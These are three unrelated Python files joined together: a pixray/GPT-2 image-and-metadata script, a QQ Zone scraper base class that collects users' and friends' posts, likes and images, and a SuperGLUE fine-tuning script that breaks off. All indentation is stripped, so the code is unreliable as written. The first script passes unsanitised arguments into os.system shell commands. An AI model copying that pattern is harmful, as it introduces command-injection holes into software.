import argparse
import boto3
from git import Repo
from git import Git
import threading
import os
import pixray
import json
from transformers import GPT2LMHeadModel, GPT2TokenizerFast
from sh import git
import numpy as np
device = 'cuda'
model_id = 'gpt2'
def perplexity(prompt):
model = GPT2LMHeadModel.from_pretrained(model_id).to(device)
tokenizer = GPT2TokenizerFast.from_pretrained(model_id)
tokens_tensor = tokenizer.encode(prompt, add_special_tokens=False, return_tensors="pt")
loss=model(tokens_tensor.to(device), labels=tokens_tensor.to(device))[0]
return np.exp(loss.cpu().detach().numpy())
def metadata_helper(tokenID, prompt, num_rerolls, num_inplace):
#get ssh get out of ssm
#get the private key for the backend datastore
#ssm = boto3.client('ssm')
#parameter = ssm.get_parameter(Name='/github/id_rsa')
#backend_private_key = parameter['Parameter']['Value']
score = perplexity(prompt[0] + ' ' + prompt[1] + ' ' + prompt[2])
#create and upload the metadata
metadata = {"description": "3words Metadata Standard v1",
"external_url": "https://3wordsproject.com",
"image": "https://duncanswilson.github.io/3words-pixray/image/{}.png".format(tokenID),
"name": prompt,
"attributes":[
{"trait_type":"perplexity","value": str(score)},
{"trait_type":"phraseId","value": "blah blah"},
{"trait_type":"word1","value": prompt[0]},
{"trait_type":"word2","value": prompt[1]},
{"trait_type":"word3","value": prompt[2]},
{"trait_type":"generation","value": '{}.{}'.format(num_rerolls, num_inplace)}]}
os.system("cp metadata/{}.json metadata-history/metadata{}-{}-{}.json".format(args.tokenID, args.tokenID, num_rerolls, num_inplace))
with open('{}.json'.format(tokenID), "wt") as f:
json.dump(metadata, f)
#os.system("git add {}.json".format(tokenID))
#os.system("git commit -m 'add the metadata for {} generation {}.{}'".format(tokenID, num_rerolls, num_inplace))
#os.system("git push origin master")
parser = argparse.ArgumentParser(description='blah')
parser.add_argument("--tokenID", type=int, help="")
parser.add_argument("--word1", type=str, help="")
parser.add_argument("--word2", type=str, help="")
parser.add_argument("--word3", type=str, help="")
parser.add_argument("--num_rerolls", type=str, help="")
parser.add_argument("--num_inplace", type=str, help="")
args = parser.parse_args()
#s3 = boto3.client('s3', region_name='us-east-1')
#s3.download_file('reroll-app', 'queue.json', 'queue.json')
#s3.download_file('reroll-app', 'reroll_log.json', 'reroll_log.json')
#reroll_log = json.load(open("reroll_log.json", "rt"))
#os.system("wget https://reroll-app.s3.amazonaws.com/reroll_log.json")
#reroll_log = json.loads(open('reroll_log.json').read())
#import pdb; pdb.set_trace()
#num_rerolls = len(reroll_log[str(args.tokenID)])
#num_inplace = 0
#for reroll in reroll_log[str(args.tokenID)]:
# if reroll['_word1'] == args.word1 and reroll['_word2'] == args.word2 and reroll['_word3'] == args.word3:
# if reroll['inPlace']:
# num_inplace +=1
#move the old image to the backup folder
os.system("cp image/{}.png image-history/{}-{}-{}.png".format(args.tokenID, args.tokenID, args.num_rerolls, args.num_inplace))
#os.system("git add image-history/{}-{}-{}.png".format( args.tokenID, num_rerolls, num_inplace))
#os.system("git commit -m 'adding new history of tokenID {}'".format(args.tokenID))
#os.system("push -u origin master")
print("---> Kicking off Metadata Helper Func")
#in a subprocess kick off metadata_helper
prompt =[]
prompt.append(args.word1)
prompt.append(args.word2)
prompt.append(args.word3)
th = threading.Thread(target=metadata_helper, args=(args.tokenID, prompt, args.num_rerolls, args.num_inplace))
th.start()
pixray.reset_settings()
pixray.add_settings(quality="better", scale=2.5, aspect='square')
real_prompt = "a clear image of " + prompt[0] + ' ' + prompt[1] + ' ' + prompt[2] + ". #pixelart"
pixray.add_settings(prompts=real_prompt)
pixray.add_settings(drawer='pixel')
pixray.add_settings(output= (str(args.tokenID)+".png"))
settings = pixray.apply_settings()
pixray.do_init(settings)
run_complete = False
while run_complete == False:
run_complete = pixray.do_run(settings, return_display=True)
#temp_copy = create_temporary_copy(settings.output)
#yield pathlib.Path(os.path.realpath(temp_copy))
#os.system("cp {}.png image/{}.png".format(tokenID, tokenID))
#os.system("git add image/{}.png".format(tokenID))
#os.system("git commit -m 'adding iteration {} of tokenID {}'".format(counter, tokenID))
#os.system("git push origin master")
|
BaseSpider.py
|
import datetime
import requests
from src.threadPool.ImageThreadPool import ImageThreadPool
from src.util import util
from copy import deepcopy
import json
from src.util.constant import BASE_DIR, EXPIRE_TIME_IN_SECONDS, BASE_PATH, QR_CODE_MAP_KEY
import re
import logging
from src.web.entity.UserInfo import UserInfo
from src.web.web_util.web_util import get_redis_conn
import matplotlib.pyplot as plt
import threading
import random
from PIL import Image
class BaseSpider(object):
"""
基类,初始化与爬虫相关的工具和方法
"""
def __init__(self, use_redis=False, debug=False, mood_begin=0, mood_num=-1, stop_time='-1',
download_small_image=False, download_big_image=False,
download_mood_detail=True, download_like_detail=True, download_like_names=True, recover=False,
cookie_text=None, from_web=False, username='', nickname='', no_delete=True, pool_flag='127.0.0.1', from_client=False, get_visit=False):
# 初始化下载项
self.req = requests.Session()
self.mood_begin = mood_begin
self.mood_num = mood_num
self.recover = recover
self.download_small_image = download_small_image
self.download_big_image = download_big_image
self.download_mood_detail = download_mood_detail
self.download_like_detail = download_like_detail
self.download_like_names = download_like_names
# 控制线程数量,包括获取动态的线程数量和好友数据的线程数量,默认为10,这里表示两个子任务都开启10个线程
self.thread_num = 10
self.thread_list = []
self.from_client = from_client
self.no_delete = no_delete
if stop_time != '-1':
self.stop_time = util.get_mktime(stop_time)
else:
self.stop_time = -1
self.begin_time = datetime.datetime.now()
self.host = 'https://user.qzone.qq.com'
self.h5_host = 'h5.qzone.qq.com'
self.http_host = 'http://user.qzone.qq.com'
self.use_redis = use_redis
self.debug = debug
self.cookie_text = cookie_text
self.pool_flag = pool_flag
self.from_web = from_web
self.random_qr_name = str(random.random())
self.get_visit = get_visit
self.QR_CODE_PATH = BASE_PATH + '/src/web/static/image/qr' + self.random_qr_name
self.headers = {
'host': 'user.qzone.qq.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.8',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:66.0) Gecko/20100101 Firefox/66.0',
'connection': 'keep-alive'
}
self.h5_headers = deepcopy(self.headers)
self.h5_headers['host'] = self.h5_host
self.visit_list = []
if use_redis:
self.re = self.connect_redis()
if not from_web and not from_client:
self.username, self.password, self.nickname = self.get_username_password()
else:
self.username = username
self.nickname = nickname
# 保存用户的二维码名称,传递给前端
if self.use_redis:
self.re.hset(QR_CODE_MAP_KEY, self.username, self.random_qr_name)
self.init_user_info()
self.image_thread_pool = ImageThreadPool(20)
def init_user_info(self):
self.init_file_name()
self.mood_host = self.http_host + '/' + self.username + '/mood/'
# 在爬取好友动态时username会变为好友的QQ号,所以此处需要备份
self.raw_username = deepcopy(self.username)
self.raw_nickname = deepcopy(self.nickname)
self.user_info = UserInfo(self.username).load()
if self.user_info is None:
self.user_info = UserInfo(self.username)
self.user_info.QQ = self.username
self.user_info.nickname = self.nickname
def get_username_password(self):
config_path = BASE_DIR + 'config/userinfo.json'
try:
with open(config_path, 'r', encoding='utf-8') as r:
userinfo = json.load(r)
return userinfo['username'], userinfo['password'], userinfo['nick_name']
except:
print("Error: File Not Found==============")
print("请检查配置文件是否正确配置!!!!")
print("Please check config file")
print("Path:", config_path)
exit(1)
# 将响应字符串转化为标准Json
def get_json(self, str1):
arr = re.findall(r'[^()]+', str1)
# for i in range(1, len(arr) - 1):
# json += arr[i]
json = "".join(arr[1:-1])
return json.strip()
# 从本地恢复数据(用于爬虫意外中断之后的数据恢复)
def do_recover_from_exist_data(self):
if self.use_redis:
try:
self.content = json.loads(self.re.get(self.CONTENT_FILE_NAME))
self.like_list_names = json.loads(self.re.get(self.LIKE_LIST_NAME_FILE_NAME))
self.mood_details = json.loads(self.re.get(self.MOOD_DETAIL_FILE_NAME))
self.like_detail = json.loads(self.re.get(self.LIKE_DETAIL_FILE_NAME))
if self.debug:
print('Finish to recover data from redis:')
print('content:', len(self.content))
print('like_list_names:', len(self.like_list_names))
print('mood_details:', len(self.mood_details))
print('like_detail:', len(self.like_detail))
return len(self.like_list_names)
except BaseException as e:
self.format_error(e, 'Failed to recover data from redis')
print('Now, try to recover data from json files...')
self.load_all_data_from_json()
else:
self.load_all_data_from_json()
def format_error(self, e, msg=""):
if not self.from_client:
print('ERROR===================')
if self.debug:
print(e)
print(msg)
try:
self.logging.exception(msg=e)
self.logging.error(msg)
except:
pass
print('ERROR===================')
if self.debug:
# raise e
pass
def logging_info(self, info):
self.logging.info(info)
def init_parameter(self):
self.mood_count = 0
self.like_detail = []
self.like_list_names = []
self.content = []
self.unikeys = []
self.tid = ""
self.mood_details = []
self.error_like_detail_unikeys = []
self.error_like_list_unikeys = []
self.error_mood_unikeys = []
self.error_like_detail = {}
self.error_like_list = {}
self.error_mood = {}
self.until_stop_time = True
def init_log(self):
filelog = True
logging_dir = self.USER_BASE_DIR + 'log/'
if self.debug:
print("logging_dir:", logging_dir)
util.check_dir_exist(logging_dir)
# logging.basicConfig(level=logging.INFO,
# format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
# datefmt='%a, %d %b %Y %H:%M:%S',
# filename=logging_dir + self.username + '.log',
# filemode='w+')
log_path = logging_dir + self.username + '.log'
logger = logging.getLogger('log')
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')
if filelog:
fh = logging.FileHandler(log_path, encoding='utf-8')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
def init_file_name(self):
"""
初始化所有文件名
:return:
"""
self.USER_BASE_DIR = BASE_DIR + self.username + '/'
self.logging = self.init_log()
self.logging.info('file_name_head:' + self.username)
DATA_DIR_HEAD = self.USER_BASE_DIR + 'data/'
self.CONTENT_FILE_NAME = DATA_DIR_HEAD + 'QQ_content.json'
self.LIKE_DETAIL_FILE_NAME = DATA_DIR_HEAD + 'QQ_like_detail' + '.json'
self.LIKE_LIST_NAME_FILE_NAME = DATA_DIR_HEAD + 'QQ_like_list_name' + '.json'
self.MOOD_DETAIL_FILE_NAME = DATA_DIR_HEAD + 'QQ_mood_detail' + '.json'
ERROR_DIR_HEAD = self.USER_BASE_DIR + 'error/'
self.ERROR_LIKE_DETAIL_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_detail_error' + '.json'
self.ERROR_LIKE_LIST_NAME_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_list_name_error' + '.json'
self.ERROR_MOOD_DETAIL_FILE_NAME = ERROR_DIR_HEAD + 'QQ_mood_detail_error' + '.json'
self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_detail_error_unikey' + '.txt'
self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME = ERROR_DIR_HEAD + 'QQ_like_list_error_unikey' + '.txt'
self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME = ERROR_DIR_HEAD + 'QQ_mood_detail_error_unikey' + '.txt'
self.SMALL_IMAGE_DIR = self.USER_BASE_DIR + 'qq_image/'
self.BIG_IMAGE_DIR = self.USER_BASE_DIR + 'qq_big_image/'
util.check_dir_exist(DATA_DIR_HEAD)
util.check_dir_exist(ERROR_DIR_HEAD)
util.check_dir_exist(self.SMALL_IMAGE_DIR)
util.check_dir_exist(self.BIG_IMAGE_DIR)
USER_BASE_DIR = BASE_DIR + self.username + '/'
util.check_dir_exist(USER_BASE_DIR)
FRIEND_DIR_HEAD = USER_BASE_DIR + 'friend/'
self.FRIEND_LIST_FILE_NAME = FRIEND_DIR_HEAD + 'friend_list.json'
self.FRIEND_DETAIL_FILE_NAME = FRIEND_DIR_HEAD + 'friend_detail.json'
self.FRIEND_DETAIL_LIST_FILE_NAME = FRIEND_DIR_HEAD + 'friend_detail_list.csv'
self.FRIEND_DETAIL_EXCEL_FILE_NAME = FRIEND_DIR_HEAD + 'friend_detail_list.xlsx'
# 头像下载到web的static文件夹,以便在web中调用
self.FRIEND_HEADER_IMAGE_PATH = BASE_PATH + '/src/web/static/image/' + self.username + '/header/'
self.web_image_bash_path = BASE_PATH + '/src/web/static/image/'+ self.username + '/'
util.check_dir_exist(USER_BASE_DIR + 'friend/')
util.check_dir_exist(self.FRIEND_HEADER_IMAGE_PATH)
self.init_analysis_path()
if self.debug:
print("Init file Name Finish:", self.USER_BASE_DIR)
def init_analysis_path(self):
self.friend_dir = BASE_DIR + self.username + '/friend/' + 'friend_detail_list.csv'
self.history_like_agree_file_name = BASE_DIR + self.username + '/friend/' + 'history_like_list.json'
RESULT_BASE_DIR = self.USER_BASE_DIR + "data/result/"
self.MOOD_DATA_FILE_NAME = RESULT_BASE_DIR + 'mood_data.csv'
self.MOOD_DATA_EXCEL_FILE_NAME = RESULT_BASE_DIR + 'mood_data.xlsx'
LABEL_BASE_DIR = self.USER_BASE_DIR + "data/label/"
self.LABEL_FILE_CSV = LABEL_BASE_DIR + 'label_data.csv'
self.LABEL_FILE_EXCEL = LABEL_BASE_DIR + 'label_data.xlsx'
self.label_path = self.USER_BASE_DIR + 'data/label/'
self.image_path = self.USER_BASE_DIR + 'image/'
util.check_dir_exist(RESULT_BASE_DIR)
util.check_dir_exist(LABEL_BASE_DIR)
util.check_dir_exist(self.label_path)
util.check_dir_exist(self.image_path)
def load_all_data_from_json(self):
self.content = self.load_data_from_json(self.CONTENT_FILE_NAME)
self.like_list_names = self.load_data_from_json(self.LIKE_LIST_NAME_FILE_NAME)
self.mood_details = self.load_data_from_json(self.MOOD_DETAIL_FILE_NAME)
self.like_detail = self.load_data_from_json(self.LIKE_DETAIL_FILE_NAME)
print("Success to Load Data From Json")
def load_data_from_json(self, file_name):
try:
with open(file_name, encoding='utf-8') as content:
data = json.load(content)
return data
except BaseException as e:
self.format_error(e, 'Failed to load data ' + file_name)
def delete_cache(self):
self.re.delete(self.LIKE_LIST_NAME_FILE_NAME)
self.re.delete(self.MOOD_DETAIL_FILE_NAME)
self.re.delete(self.LIKE_DETAIL_FILE_NAME)
def save_data_to_redis(self, final_result=False):
"""
保存数据到redis中
:param final_result: 是否为最终结果,如果是,则会保存错误信息,如果不是,则仅做缓存
:return:
"""
try:
if self.use_redis:
self.re.set(self.CONTENT_FILE_NAME, json.dumps(self.content, ensure_ascii=False))
if self.download_like_names:
self.re.set(self.LIKE_LIST_NAME_FILE_NAME,
json.dumps(self.like_list_names, ensure_ascii=False))
if self.download_mood_detail:
self.re.set(self.MOOD_DETAIL_FILE_NAME,
json.dumps(self.mood_details, ensure_ascii=False))
if self.download_like_detail:
self.re.set(self.LIKE_DETAIL_FILE_NAME,
json.dumps(self.like_detail, ensure_ascii=False))
if not self.no_delete:
self.re.expire(self.LIKE_LIST_NAME_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.MOOD_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.LIKE_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
if final_result:
if self.download_like_detail:
self.re.set(self.ERROR_LIKE_DETAIL_FILE_NAME,
json.dumps(self.error_like_detail, ensure_ascii=False))
self.re.set(self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME, "==".join(self.error_like_detail_unikeys))
if self.download_like_names:
self.re.set(self.ERROR_LIKE_LIST_NAME_FILE_NAME,
json.dumps(self.error_like_list, ensure_ascii=False))
self.re.set(self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME, "==".join(self.error_like_list_unikeys))
if self.download_mood_detail:
self.re.set(self.ERROR_MOOD_DETAIL_FILE_NAME,
json.dumps(self.error_mood, ensure_ascii=False))
self.re.set(self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME, "==".join(self.error_mood_unikeys))
if not self.no_delete:
self.re.expire(self.ERROR_LIKE_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_LIKE_DETAIL_UNIKEY_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_LIKE_LIST_NAME_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_MOOD_DETAIL_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
self.re.expire(self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME, EXPIRE_TIME_IN_SECONDS)
except BaseException as e:
self.format_error(e, 'Faild to save data in redis')
def save_data_to_json(self, data, file_name):
try:
with open(file_name, 'w', encoding='utf-8') as w2:
json.dump(data, w2, ensure_ascii=False)
except BaseException as e:
self.format_error(e, 'Failed to save file:' + file_name)
def save_data_to_txt(self, data, file_name):
try:
with open(file_name, 'w', encoding='utf-8') as w:
w.write(";".join(data))
except BaseException as e:
self.format_error(e, 'Failed to save file:' + file_name)
def save_all_data_to_json(self):
self.save_data_to_json(data=self.content, file_name=self.CONTENT_FILE_NAME)
if self.download_mood_detail:
self.save_data_to_json(data=self.mood_details, file_name=self.MOOD_DETAIL_FILE_NAME)
self.save_data_to_json(data=self.error_mood, file_name=self.ERROR_MOOD_DETAIL_FILE_NAME)
self.save_data_to_txt(data=self.error_mood_unikeys, file_name=self.ERROR_MOOD_DETAIL_UNIKEY_FILE_NAME)
if self.download_like_names:
self.save_data_to_json(data=self.like_detail, file_name=self.LIKE_DETAIL_FILE_NAME)
self.save_data_to_json(data=self.error_like_detail, file_name=self.ERROR_LIKE_DETAIL_FILE_NAME)
self.save_data_to_txt(data=self.error_like_detail_unikeys, file_name=self.ERROR_LIKE_DETAIL_FILE_NAME)
if self.download_like_detail:
self.save_data_to_json(data=self.like_list_names, file_name=self.LIKE_LIST_NAME_FILE_NAME)
self.save_data_to_json(data=self.error_like_list, file_name=self.ERROR_LIKE_LIST_NAME_FILE_NAME)
self.save_data_to_txt(data=self.error_like_list_unikeys,
file_name=self.ERROR_LIKE_LIST_NAME_UNIKEY_FILE_NAME)
def connect_redis(self):
conn = get_redis_conn(self.pool_flag)
if conn is None:
print("连接数据库失败")
exit(1)
else:
return conn
def check_time(self, mood, stop_time, until_stop_time=True):
create_time = mood['created_time']
if self.debug:
print('time:', create_time, stop_time)
if stop_time >= create_time:
until_stop_time = False
print('达到设置的停止时间,即将退出爬虫')
return until_stop_time
else:
return until_stop_time
def check_comment_num(self, mood):
cmt_num = mood['cmtnum']
if cmt_num > 20:
return cmt_num
else:
return -1
def download_image(self, url, name):
image_url = url
try:
r = self.req.get(url=image_url, headers=self.headers, timeout=20)
image_content = r.content
# 异步保存图片,提高效率
# t = threading.Thread(target=self.save_image_concurrent, args=(image_content, name))
# t.start()
thread = self.image_thread_pool.get_thread()
t = thread(target=self.save_image_concurrent, args=(image_content, name))
t.start()
# t = self.image_thread_pool2.submit(self.save_image_concurrent, (image_content, name))
except BaseException as e:
self.format_error(e, 'Failed to download image:' + name)
def save_image_concurrent(self, image, name):
try:
file_image = open(name + '.jpg', 'wb+')
file_image.write(image)
file_image.close()
self.image_thread_pool.add_thread()
except BaseException as e:
self.format_error(e, "Failed to save image:" + name)
def save_image_single(self, image, name):
try:
file_image = open(name + '.jpg', 'wb+')
file_image.write(image)
file_image.close()
except BaseException as e:
self.format_error(e, "Failed to save image:" + name)
def show_image(self, file_path):
t = threading.Thread(target=self.do_show_image, args=(file_path,))
t.start()
def do_show_image(self, file_path):
# image = mpimg.imread(file_path)
image = Image.open(file_path)
plt.imshow(image)
plt.axis('off')
plt.show()
def result_report(self):
print("#######################")
print('爬取用户:', self.username)
print('总耗时:', (datetime.datetime.now() - self.begin_time).seconds / 60, '分钟')
print('QQ空间动态数据数量:', len(self.mood_details))
print('最终失败的数据量:')
print('--------------')
print('动态:', len(self.error_mood_unikeys))
print('点赞详情(包括浏览量):', len(self.error_like_detail_unikeys))
print('点赞好友列表:', len(self.error_like_list_unikeys))
print('--------------')
print("########################")
|
run_superglue.py
|
# coding=utf-8
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
#
# All the modifications on top of
# https://github.com/W4ngatang/transformers/blob/superglue/examples/run_superglue.py
# are under the MIT license by Microsoft.
#
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on SuperGLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa)."""
""" This is based on Alex Wang's transformers repository, superglue branch. https://github.com/W4ngatang/transformers
https://github.com/W4ngatang/transformers/blob/superglue/examples/run_superglue.py """
import sys
import argparse
import glob
import json
import logging
import os
import random
import time
from queue import PriorityQueue
from heapq import heappush, heappop
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from torch._utils import ExceptionWrapper
from multiprocessing import Process, Queue
from tqdm import tqdm
from torch.nn import MSELoss, CosineSimilarity
from transformers import superglue_compute_metrics as compute_metrics
from transformers import superglue_convert_examples_to_features as convert_examples_to_features
from transformers import superglue_output_modes as output_modes
from transformers import superglue_processors as processors
from transformers import superglue_tasks_metrics as task_metrics
from transformers import superglue_tasks_num_spans as task_spans
from transformers import ( # AlbertForSequenceClassification,; AlbertTokenizer,; DistilBertForSequenceClassification,; DistilBertTokenizer,; FlaubertForSequenceClassification,; FlaubertTokenizer,; XLMForSequenceClassification,; XLMRobertaForSequenceClassification,; XLMRobertaTokenizer,; XLMTokenizer,; XLNetForSequenceClassification,; XLNetTokenizer,
WEIGHTS_NAME,
AdamW,
AlbertConfig,
BertConfig,
BertForSequenceClassification,
BertForSpanClassification,
BertTokenizer,
DistilBertConfig,
FlaubertConfig,
RobertaConfig,
RobertaForSequenceClassification,
RobertaForSpanClassification,
RobertaTokenizer,
XLMConfig,
XLMRobertaConfig,
XLNetConfig,
get_linear_schedule_with_warmup,
)
logger = logging.getLogger(__name__)
ALL_MODELS = sum(
(
tuple(conf.pretrained_config_archive_map.keys())
for conf in (
BertConfig,
XLNetConfig,
XLMConfig,
RobertaConfig,
DistilBertConfig,
AlbertConfig,
XLMRobertaConfig,
FlaubertConfig,
)
),
(),
)
MODEL_CLASSES = {
# "bert": (BertConfig, BertForSequenceClassification, BertTokenizer),
# "xlnet": (XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer),
# "xlm": (XLMConfig, XLMForSequenceClassification, XLMTokenizer),
# "roberta": (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer),
# "distilbert": (DistilBertConfig, DistilBertForSequenceClassification, DistilBertTokenizer),
# "albert": (AlbertConfig, AlbertForSequenceClassification, AlbertTokenizer),
# "xlmroberta": (XLMRobertaConfig, XLMRobertaForSequenceClassification, XLMRobertaTokenizer),
# "flaubert": (FlaubertConfig, FlaubertForSequenceClassification, FlaubertTokenizer),
"bert": (
BertConfig,
BertTokenizer,
{"classification": BertForSequenceClassification, "span_classification": BertForSpanClassification},
),
"roberta": (
RobertaConfig,
RobertaTokenizer,
{"classification": RobertaForSequenceClassification, "span_classification": RobertaForSpanClassification},
),
}
TASK2FILENAME = {
"boolq": "BoolQ.jsonl",
"cb": "CB.jsonl",
"copa": "COPA.jsonl",
"multirc": "MultiRC.jsonl",
"record": "ReCoRD.jsonl",
"rte": "RTE.jsonl",
"wic": "WiC.jsonl",
"wsc": "WSC.jsonl",
}
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def train(args, train_dataset, model, tokenizer):
""" Train the model """
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else: # number of training steps = number of epochs * number of batches
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
num_warmup_steps = int(args.warmup_ratio * t_total)
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=num_warmup_steps, num_training_steps=t_total
)
# Check if saved optimizer or scheduler states exist
if os.path.isfile(os.path.join(args.model_name_or_path, "optimizer.pt")) and os.path.isfile(
os.path.join(args.model_name_or_path, "scheduler.pt")
):
# Load in optimizer and scheduler states
optimizer.load_state_dict(torch.load(os.path.join(args.model_name_or_path, "optimizer.pt")))
scheduler.load_state_dict(torch.load(os.path.join(args.model_name_or_path, "scheduler.pt")))
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)
logger.info("Training with fp16.")
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True,
)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size
* args.gradient_accumulation_steps
* (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
epochs_trained = 0
steps_trained_in_current_epoch = 0
# Check if continuing training from a checkpoint
if os.path.exists(args.model_name_or_path):
# set global_step to global_step of last saved checkpoint from model path
try:
global_step = int(args.model_name_or_path.split("-")[-1].split("/")[0])
except ValueError:
global_step = 0
epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
steps_trained_in_current_epoch = global_step % (len(train_dataloader) // args.gradient_accumulation_steps)
logger.info(" Continuing training from checkpoint, will skip to saved global_step")
logger.info(" Continuing training from epoch %d", epochs_trained)
logger.info(" Continuing training from global step %d", global_step)
logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch)
tr_loss, logging_loss = 0.0, 0.0
model.zero_grad()
# train_iterator = trange(
# epochs_trained, int(args.num_train_epochs), desc="Epoch", disable=args.local_rank not in [-1, 0],
# )
train_iterator = range(epochs_trained, int(args.num_train_epochs))
set_seed(args) # Added here for reproductibility
best_val_metric = None
for epoch_n in train_iterator:
epoch_iterator = tqdm(train_dataloader, desc=f"Epoch {epoch_n}", disable=args.local_rank not in [-1, 0])
for step, batch in enumerate(epoch_iterator):
# Skip past any already trained steps if resuming training
if steps_trained_in_current_epoch > 0:
steps_trained_in_current_epoch -= 1
continue
model.train()
batch = tuple(t.to(args.device) for t in batch)
inputs = {"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[3]}
if args.output_mode == "span_classification":
inputs["spans"] = batch[4]
if args.model_type != "distilbert":
inputs["token_type_ids"] = (
batch[2] if args.model_type in ["bert", "xlnet", "albert"] else None
) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids
outputs = model(**inputs)
loss = outputs[0] # model outputs are always tuple in transformers (see doc)
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
epoch_iterator.set_description(f"Epoch {epoch_n} loss: {loss:.3f}")
if (step + 1) % args.gradient_accumulation_steps == 0:
if args.fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
results = None
logs = {}
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
if (
args.local_rank == -1 and args.log_evaluate_during_training and results is None
): # Only evaluate when single GPU otherwise metrics may not average well
results, _, _ = evaluate(args, args.task_name, model, tokenizer, use_tqdm=False)
for key, value in results.items():
eval_key = "eval_{}".format(key)
logs[eval_key] = value
loss_scalar = (tr_loss - logging_loss) / args.logging_steps
learning_rate_scalar = scheduler.get_last_lr()[0]
logs["learning_rate"] = learning_rate_scalar
logs["avg_loss_since_last_log"] = loss_scalar
logging_loss = tr_loss
logging.info(json.dumps({**logs, **{"step": global_step}}))
if (
args.local_rank in [-1, 0]
and args.eval_and_save_steps > 0
